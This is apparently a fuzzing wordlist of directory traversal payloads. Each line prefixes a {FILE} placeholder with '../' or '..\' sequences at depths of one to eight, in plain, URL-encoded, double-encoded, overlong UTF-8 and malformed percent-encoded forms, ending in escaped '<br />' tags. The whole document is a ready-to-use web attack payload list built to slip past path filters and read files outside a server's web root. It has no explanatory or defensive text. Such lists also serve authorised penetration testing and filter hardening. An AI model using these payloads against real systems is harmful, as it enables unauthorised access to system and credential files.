..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
